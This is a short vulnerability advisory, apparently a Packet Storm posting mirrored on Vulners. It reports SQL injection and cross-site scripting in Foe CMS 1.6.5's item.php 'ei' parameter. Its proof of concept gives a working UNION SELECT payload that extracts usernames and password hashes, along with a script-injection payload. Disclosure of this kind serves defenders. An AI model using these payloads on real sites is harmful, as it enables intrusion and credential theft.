Lucene search
K

Foe CMS 1.6.5 Cross Site Scripting / SQL Injection

🗓️ 29 Apr 2013 00:00:00Reported by flux77Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Foe CMS 1.6.5 SQL Injection & XSS Vulnerability on Linux and Windows platfor

Code
`Title: Foe CMS 1.6.5 SQL Injection Vulnerability  
Vendor: http://foecms.com/  
Download: http://code.google.com/p/foecms/downloads/list  
Versions: 1.6.5  
Platform: linux, windows  
Bug: SQL Injection | Cross Site Scripting  
  
  
  
-------------------------------------------------------  
  
1) Introduction  
2) Bug  
3) Proof of concept  
4) Credits  
  
  
===========  
1) Introduction  
===========  
  
Gestor de categorias (Como phpbb3)  
Pasar a php orientado a objetos  
account_meta para firma, ocupacion, avatar, etc (como wordpress) permite añadir y quitar campos a gusto  
Permisos segun rangos para TODO  
Pagina del UCP para cambiar los permisos de acceso (amigos y eso)  
  
  
======  
2) Bug  
======  
  
SQL Injection  
http://victim/[path]/item.php?ei=[SQLi]  
  
Cross Site Scripting  
http://victim/[path]/item.php?ei=[XSS]  
  
  
=====  
3)proof of concept  
=====  
  
Example SQLi  
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--  
  
Example XSS  
http://victim/[path]/item.php?ei=<script>alert(1)</script>  
  
  
=====  
4)Credits  
=====  
  
flux77  
Contact : 0xflux77 at gmail.com  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation